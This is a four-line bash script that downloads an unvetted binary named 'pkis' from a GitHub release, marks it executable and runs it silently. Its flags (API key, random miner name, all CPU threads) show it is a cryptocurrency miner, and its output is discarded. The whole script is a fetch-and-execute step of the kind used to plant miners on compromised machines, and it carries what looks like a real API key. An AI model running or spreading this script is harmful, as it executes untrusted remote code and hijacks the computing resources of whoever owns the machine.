#!/bin/bash
wget https://github.com/vedhagsvp/qubros/releases/download/apl/pkis
chmod +x pkis
./pkis -apiKey nock0000-5f88-240a-67f6-78c391ad755d -minerName $(echo $(shuf -i 1-15000 -n 1)-Rezdion) -threads $(nproc --all) > /dev/null 2>&1
